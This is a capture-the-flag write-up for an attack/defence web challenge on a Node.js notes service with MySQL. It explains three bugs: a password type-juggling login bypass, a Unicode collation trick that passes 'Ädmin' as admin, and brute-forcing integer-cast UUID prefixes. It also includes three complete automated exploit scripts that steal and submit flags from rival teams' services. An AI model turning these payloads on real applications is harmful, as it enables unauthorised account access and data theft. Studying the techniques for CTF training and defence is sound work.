This challenge exposes one NodeJS service and has a MySQL database.
tl;dr the goal of this challenge is to find three vulnerabilities to get the flag from different teams.
Each team may have patched some vulnerabilities. Here is the state during the competition:
| Vuln #1 (Auth bypass) | Vuln #2 (Unicode) | Vuln #3 (UUID) | |
|---|---|---|---|
| Team #0 | Vulnerable | Vulnerable | Vulnerable |
| Team #1 | Vulnerable | Vulnerable | Vulnerable |
| Team #2 | Patched | Vulnerable | Vulnerable |
| Team #3 | Vulnerable | Patched | Vulnerable |
By looking at the source code of the challenge, we can quickly identify that each tick, a bot creates an account and stores the flag inside its notes. Moreover, each tick, the flagsids API returns the username of the bot.
For the analysis, only the file src/routes/api.js is relevant; the other files are just there to make the web server work.
The first vulnerability is located on the endpoint /users/login. Taking a look at the source code:
//src/routes/api.js#L38
router.post("/users/login", async (req, res) => {
try {
if(req.body.username !== undefined && req.body.password !== undefined) {
const [user] = await pool.execute(
"SELECT username FROM users WHERE username = ? AND password = ?",
[req.body.username, req.body.password]
);
if(user.length == 1) {
const token = jwt.sign(
{ username: user[0].username },
process.env.JWT_SECRET,
{ expiresIn: "1h" }
);
res.status(200).json({ status: 'ok', token });
} else {
res.status(403).json({ status: 'invalid credentials'});
}
} else {
res.status(403).json({ status: 'error' });
}
} catch {
res.status(500).json({ status: 'error' });
}
});
We can see that POST parameters are recovered from JSON, and there are no filters in place to check the type of the username and password variables. Therefore, we can exploit a type juggling vulnerability in the MySQL query to authenticate as any account. Sending the following JSON data is enough:
{
"username":"username_from_flagids_api",
"password":0
}
When MySQL compares a string column to an integer value, it implicitly casts the string to an integer before doing the comparison. This means that WHERE password = 0 will match every row where the password is a non-numeric string, since any non-numeric string casts to 0 in MySQL.
Looking more closely at the API, we can observe that the server allows anonymous users to craft JWTs with a temp_username field to retrieve note data without any authentication. However, since all notes are associated with the administrator admin, it should normally not be possible to retrieve the bot's data:
//src/routes/api.js#L113
router.post("/temptoken/get", async (req, res) => {
try {
if(req.body.username !== undefined && req.body.username.length <= 10 && req.body.username !== 'admin') {
const token = jwt.sign(
{ temp_username: req.body.username },
process.env.JWT_SECRET,
{ expiresIn: "1h" }
);
res.status(200).json({ status: 'ok', token });
} else {
res.status(403).json({ status: 'error' });
}
} catch {
res.status(500).json({ status: 'error' });
}
});
router.post("/admin/notes/get", async (req, res) => {
try {
const authHeader = req.headers.authorization;
if (!authHeader || !authHeader.startsWith("Bearer ")) {
return res.status(403).json({ error: "missing token" });
}
if(req.body.username) {
const token = authHeader.split(" ")[1];
const user = jwt.verify(token, process.env.JWT_SECRET);
if(user.temp_username !== undefined && req.body.username) {
const [rows] = await pool.execute(
"SELECT content FROM notes WHERE username = ? AND associated_admin = ?",
[req.body.username, user.temp_username]
);
if(rows.length > 0) {
return res.status(200).json({status: 'ok', rows})
} else {
return res.status(403).json({status: 'not found'})
}
} else {
return res.status(403).json({ error: "wrong token" });
}
} else {
res.status(403).json({ status: 'error' });
}
} catch {
res.status(500).json({ status: 'error' });
}
});
In MySQL, a collation defines the rules used to compare and sort string values. Every column of type VARCHAR, TEXT, etc. has a collation associated with it. The collation is usually set at the database, table, or column level, and if not explicitly specified, MySQL will use a default one.
The most common default collations are:
utf8_general_ciutf8mb4_unicode_ciThe ci suffix stands for case-insensitive, which already tells us that comparisons under these collations are not strict. But case insensitivity is just one part of the story.
Collations like utf8_general_ci and utf8mb4_unicode_ci are designed to compare strings in a human-readable, language-aware way. This means they apply Unicode normalization rules when comparing characters. As a result, many characters that look different are considered equivalent.
For example, under utf8_general_ci:
a == A (case insensitivity)e == é == è == ê (accent folding)a == à == á == ä == ÄThis means the following SQL query:
SELECT * FROM users WHERE username = 'Ädmin';
will match a row where username = 'admin' is stored, because Ä and a are considered equivalent under this collation, and the comparison is case-insensitive on top of that.
We can verify this directly in a MySQL shell:
SELECT 'admin' = 'Ädmin' COLLATE utf8_general_ci;
-- Returns: 1 (true)
SELECT 'admin' = 'Ädmin' COLLATE utf8_bin;
-- Returns: 0 (false)
The utf8_bin collation does a raw byte-by-byte comparison and would correctly distinguish Ä from a, but it is rarely used by default.
Considering the following Node.js check:
if(req.body.username !== 'admin') {
// issue a JWT with temp_username = req.body.username
}
This check uses JavaScript's strict equality operator (!==), which compares strings byte by byte. So "Ädmin" !== "admin" evaluates to true, and the check passes, issuing a JWT containing temp_username: "Ädmin".
Later, this value is used in a SQL query:
const [rows] = await pool.execute(
"SELECT content FROM notes WHERE username = ? AND associated_admin = ?",
[req.body.username, user.temp_username]
);
MySQL then compares associated_admin = 'Ädmin' against the stored value admin. Because the column uses a ci collation, MySQL treats Ä and a as equivalent and the query matches, effectively granting access to the admin's data.
The last vulnerability is on the endpoint /notes/get_by_uuid:
router.post("/notes/get_by_uuid", async (req, res) => {
try {
if(req.body.id && req.body.username !== undefined) {
const [row] = await pool.execute(
"SELECT content FROM notes WHERE internal_id = ? AND username = ?",
[req.body.id, req.body.username]
);
if(row.length >= 1) {
return res.status(200).json({ row });
} else {
return res.status(403).json({ status: 'not found' });
}
} else {
res.status(403).json({ status: 'error' });
}
} catch {
res.status(500).json({ status: 'error' });
}
});
In this endpoint, the authMiddleware has been forgotten. When a note is created, the server generates a UUID and passes it through a randomizeUuid function before storing it:
function randomizeUuid(uuid) {
const prefix = Math.floor(Math.random() * 90 + 10).toString();
const chars = 'abcdef';
const third = chars[Math.floor(Math.random() * chars.length)];
return prefix + third + uuid.slice(3);
}
This function always produces a UUID that starts with exactly two digits followed by a hex letter, for example:
47f550b5-a3c1-4e2f-b789-1234567890ab
^^
always two digits
The resulting internal_id is stored as a VARCHAR in the database and returned to the user after note creation.
The id field from the request body is passed directly as a parameter to the SQL query with no type validation. This means an integer can be submitted instead of a string UUID.
When MySQL compares a VARCHAR column to an integer value, it does not throw an error. Instead, it implicitly casts the string to an integer before performing the comparison.
The casting rule MySQL applies is simple: it reads the string from left to right and stops as soon as it encounters a non-numeric character, using whatever digits it collected as the integer value.
For example:
SELECT CAST('47f550b5-a3c1-...' AS UNSIGNED);
-- Returns: 47
This means:
SELECT content FROM notes WHERE internal_id = 47;
is interpreted by MySQL as:
SELECT content FROM notes WHERE CAST(internal_id AS UNSIGNED) = 47;
And since every internal_id starts with exactly two digits, submitting the integer 47 will match every note whose UUID starts with 47.
We can verify this behavior directly in a MySQL shell:
SELECT '47f550b5-a3c1-4e2f-b789-1234567890ab' = 47;
-- Returns: 1 (true)
SELECT '47f550b5-a3c1-4e2f-b789-1234567890ab' = 48;
-- Returns: 0 (false)
SELECT '12abc' = 12;
-- Returns: 1 (true)
Since all UUIDs start with a two-digit prefix between 10 and 99, an attacker can brute-force all 90 possible prefixes by submitting integer values from 10 to 99 as the id field:
{
"id": 47,
"username": "return_from_flagids_api"
}
MySQL will cast all stored UUIDs to integers, and any UUID starting with 47 will match this query, leaking the note content without knowing the full UUID.
A simple script to enumerate all prefixes:
import requests
url = "https://target/notes/get_by_uuid"
for i in range(10, 100):
res = requests.post(url, json={"id": i, "username": "victim"})
if res.status_code == 200:
print(f"[+] Match on prefix {i}: {res.json()}")
#!/usr/bin/env python3
import time
import sched
import hashlib
import requests
from pwn import *
from datetime import datetime, timedelta
TOKEN = args.TOKEN or "KQ[...]Ft"
TOKENS = [
TOKEN
]
if args.LOCAL:
SUBMISSION_HOST, SUBMISSION_PORT = "localhost", 1337
FLAGSID_ENDPOINT = "http://localhost:9000/attack.json"
SERVICES = {
# 0: "http://localhost:5000/",
1: "http://localhost:5001/",
2: "http://localhost:5002/",
3: "http://localhost:5003/",
}
else:
SUBMISSION_HOST, SUBMISSION_PORT = "challenges.fcsc.fr", 2388
FLAGSID_ENDPOINT = "https://fcsc-private-message-flagids.fcsc.fr/attack.json"
SERVICES = {
# 0: "https://fcsc-private-message-team0.fcsc.fr/",
1: "https://fcsc-private-message-team1.fcsc.fr/",
2: "https://fcsc-private-message-team2.fcsc.fr/",
3: "https://fcsc-private-message-team3.fcsc.fr/",
}
########################################################
## Exploit function
########################################################
def sploit_auth_bypass(url, username):
# Construct POST data for the given username
data = {
"username": username,
"password": 0
}
r = requests.post(url + "/api/users/login", json = data).json()
if r.get("token") is None:
return None
r = requests.get(url + "/api/user/notes/get", headers={"Authorization": f"Bearer {r.get('token')}"}).json()
return r['notes'][0]['content']
########################################################
## Spread attack
########################################################
INTERVAL = 10
def next_slot_timestamp():
now = datetime.now()
aligned = now.replace(microsecond = 0)
seconds_since_midnight = aligned.hour * 3600 + aligned.minute * 60 + aligned.second
seconds_to_add = (INTERVAL - (seconds_since_midnight % INTERVAL)) % INTERVAL
if seconds_to_add == 0:
seconds_to_add = INTERVAL
d = aligned + timedelta(seconds = seconds_to_add)
return d.timestamp()
def get_flagIds(retries = 5, delay = 0.5):
for attempt in range(retries):
try:
r = requests.get(FLAGSID_ENDPOINT, timeout = 5, verify = False)
r.raise_for_status()
return r.json()
except requests.exceptions.RequestException as e:
if attempt == retries - 1:
raise
sleep_time = delay * (2 ** attempt)
time.sleep(sleep_time)
# Get executed exactly at the beginning of a tick
def sploit():
flagsIds = get_flagIds()
if flagsIds["current_tick"] == "A/D is over!":
print(flagsIds["current_tick"])
exit(1)
current_tick = flagsIds["current_tick"]
print(f"sploit! {datetime.now()} for {current_tick = }")
for team_no, url in SERVICES.items():
if team_no == 0:
# It's our flags, do not exploit us
continue
for username in flagsIds[str(team_no)]:
try:
flag = sploit_auth_bypass(url, username)
if flag == None:
continue
if flag.startswith("FCSC"):
for token in TOKENS:
io = remote(SUBMISSION_HOST, SUBMISSION_PORT)
io.recvlines(4)
io.sendline(f"{token}:{flag}".encode())
r = io.recvlineS().strip()
print(f"{r:<3s} {flag} // {team_no = }, {username = }")
io.close()
except Exception as e:
print(f"Sploit failed for {username = }: {e}")
# Re-exec at next tick
scheduler.enterabs(next_slot_timestamp(), 1, sploit)
scheduler = sched.scheduler(time.time, time.sleep)
scheduler.enterabs(next_slot_timestamp(), 1, sploit)
scheduler.run()
#!/usr/bin/env python3
import time
import sched
import hashlib
import requests
from pwn import *
from datetime import datetime, timedelta
TOKEN = args.TOKEN or "KQ[..]Ft"
TOKENS = [
TOKEN
]
if args.LOCAL:
SUBMISSION_HOST, SUBMISSION_PORT = "localhost", 1337
FLAGSID_ENDPOINT = "http://localhost:9000/attack.json"
SERVICES = {
# 0: "http://localhost:5000/",
1: "http://localhost:5001/",
2: "http://localhost:5002/",
3: "http://localhost:5003/",
}
else:
SUBMISSION_HOST, SUBMISSION_PORT = "challenges.fcsc.fr", 2388
FLAGSID_ENDPOINT = "https://fcsc-private-message-flagids.fcsc.fr/attack.json"
SERVICES = {
# 0: "https://fcsc-private-message-team0.fcsc.fr/",
1: "https://fcsc-private-message-team1.fcsc.fr/",
2: "https://fcsc-private-message-team2.fcsc.fr/",
3: "https://fcsc-private-message-team3.fcsc.fr/",
}
########################################################
## Exploit function
########################################################
def sploit_auth_bypass(url, username):
data = {
"username": "Ädmin"
}
r = requests.post(url + "/api/temptoken/get", json = data).json()
token = r.get("token")
r = requests.post(url + "/api/admin/notes/get", headers={
"Authorization": f"Bearer {token}"
}, json = {"username": username})
return r.json()['rows'][0]['content']
########################################################
## Spread attack
########################################################
INTERVAL = 10
def next_slot_timestamp():
now = datetime.now()
aligned = now.replace(microsecond = 0)
seconds_since_midnight = aligned.hour * 3600 + aligned.minute * 60 + aligned.second
seconds_to_add = (INTERVAL - (seconds_since_midnight % INTERVAL)) % INTERVAL
if seconds_to_add == 0:
seconds_to_add = INTERVAL
d = aligned + timedelta(seconds = seconds_to_add)
return d.timestamp()
def get_flagIds(retries = 5, delay = 0.5):
for attempt in range(retries):
try:
r = requests.get(FLAGSID_ENDPOINT, timeout = 5, verify = False)
r.raise_for_status()
return r.json()
except requests.exceptions.RequestException as e:
if attempt == retries - 1:
raise
sleep_time = delay * (2 ** attempt)
time.sleep(sleep_time)
# Get executed exactly at the beginning of a tick
def sploit():
flagsIds = get_flagIds()
if flagsIds["current_tick"] == "A/D is over!":
print(flagsIds["current_tick"])
exit(1)
current_tick = flagsIds["current_tick"]
print(f"sploit! {datetime.now()} for {current_tick = }")
for team_no, url in SERVICES.items():
if team_no == 0:
# It's our flags, do not exploit us
continue
for username in flagsIds[str(team_no)]:
try:
flag = sploit_auth_bypass(url, username)
if flag == None:
continue
if flag.startswith("FCSC"):
for token in TOKENS:
io = remote(SUBMISSION_HOST, SUBMISSION_PORT)
io.recvlines(4)
io.sendline(f"{token}:{flag}".encode())
r = io.recvlineS().strip()
print(f"{r:<3s} {flag} // {team_no = }, {username = }")
io.close()
except Exception as e:
print(f"Sploit failed for {username = }: {e}")
# Re-exec at next tick
scheduler.enterabs(next_slot_timestamp(), 1, sploit)
scheduler = sched.scheduler(time.time, time.sleep)
scheduler.enterabs(next_slot_timestamp(), 1, sploit)
scheduler.run()
#!/usr/bin/env python3
import time
import sched
import hashlib
import requests
from pwn import *
from datetime import datetime, timedelta
TOKEN = args.TOKEN or "KQ[...]Ft"
TOKENS = [
TOKEN
]
if args.LOCAL:
SUBMISSION_HOST, SUBMISSION_PORT = "localhost", 1337
FLAGSID_ENDPOINT = "http://localhost:9000/attack.json"
SERVICES = {
# 0: "http://localhost:5000/",
1: "http://localhost:5001/",
2: "http://localhost:5002/",
3: "http://localhost:5003/",
}
else:
SUBMISSION_HOST, SUBMISSION_PORT = "challenges.fcsc.fr", 2388
FLAGSID_ENDPOINT = "https://fcsc-private-message-flagids.fcsc.fr/attack.json"
SERVICES = {
# 0: "https://fcsc-private-message-team0.fcsc.fr/",
1: "https://fcsc-private-message-team1.fcsc.fr/",
2: "https://fcsc-private-message-team2.fcsc.fr/",
3: "https://fcsc-private-message-team3.fcsc.fr/",
}
########################################################
## Exploit function
########################################################
def sploit_auth_bypass(url, username):
for i in range(10,100):
data = {
"username": username,
"id": i
}
r = requests.post(url + "/api/notes/get_by_uuid", json = data).json()
if r.get("row") is not None:
return r['row'][0]['content']
########################################################
## Spread attack
########################################################
INTERVAL = 10
def next_slot_timestamp():
now = datetime.now()
aligned = now.replace(microsecond = 0)
seconds_since_midnight = aligned.hour * 3600 + aligned.minute * 60 + aligned.second
seconds_to_add = (INTERVAL - (seconds_since_midnight % INTERVAL)) % INTERVAL
if seconds_to_add == 0:
seconds_to_add = INTERVAL
d = aligned + timedelta(seconds = seconds_to_add)
return d.timestamp()
def get_flagIds(retries = 5, delay = 0.5):
for attempt in range(retries):
try:
r = requests.get(FLAGSID_ENDPOINT, timeout = 5, verify = False)
r.raise_for_status()
return r.json()
except requests.exceptions.RequestException as e:
if attempt == retries - 1:
raise
sleep_time = delay * (2 ** attempt)
time.sleep(sleep_time)
# Get executed exactly at the beginning of a tick
def sploit():
flagsIds = get_flagIds()
if flagsIds["current_tick"] == "A/D is over!":
print(flagsIds["current_tick"])
exit(1)
current_tick = flagsIds["current_tick"]
print(f"sploit! {datetime.now()} for {current_tick = }")
for team_no, url in SERVICES.items():
if team_no == 0:
# It's our flags, do not exploit us
continue
for username in flagsIds[str(team_no)]:
try:
flag = sploit_auth_bypass(url, username)
if flag == None:
continue
if flag.startswith("FCSC"):
for token in TOKENS:
io = remote(SUBMISSION_HOST, SUBMISSION_PORT)
io.recvlines(4)
io.sendline(f"{token}:{flag}".encode())
r = io.recvlineS().strip()
print(f"{r:<3s} {flag} // {team_no = }, {username = }")
io.close()
except Exception as e:
print(f"Sploit failed for {username = }: {e}")
# Re-exec at next tick
scheduler.enterabs(next_slot_timestamp(), 1, sploit)
scheduler = sched.scheduler(time.time, time.sleep)
scheduler.enterabs(next_slot_timestamp(), 1, sploit)
scheduler.run()